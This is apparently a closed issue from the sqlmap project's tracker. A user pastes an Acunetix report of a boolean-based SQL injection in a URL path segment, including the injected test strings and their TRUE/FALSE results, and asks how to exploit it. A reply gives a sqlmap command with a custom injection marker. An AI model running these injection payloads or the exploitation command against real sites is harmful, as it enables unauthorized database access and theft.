Closed 12553240Kj closed 1 year ago
Hello. Acunetix found a vulnerability. Can you tell me how I can exploit it in sqlmap?
URL: https://site.com/ Parameter: **/<s>/<n>-[*]/** Attack Details Path Fragment input /<s>/<n>-[*]/ was set to d'|a|'ark-yellow GET /schuh/88-d'|a|'ark-yellow/ Original value: dark-yellow Tests performed: dark-yellow'||' => TRUE dark-yellow'|||' => FALSE dark-yellow'||''||' => TRUE dark-yellow'||'000247'||' => FALSE '||''||'dark-yellow => TRUE zzz'||'000247'||'dark-yellow => FALSE dark-yellow000247 => FALSE d'||'ark-yellow => TRUE d'|a|'ark-yellow => FALSE
1) "acunetix found" can mean anything. if sqlmap fails, then stick to acunetix 2) you can put custom injection marker anywhere inside the URL, like:
python sqlmap.py -u https://site.com/dark-yellow*
Hello. Acunetix found a vulnerability. Can you tell me how I can exploit it in sqlmap?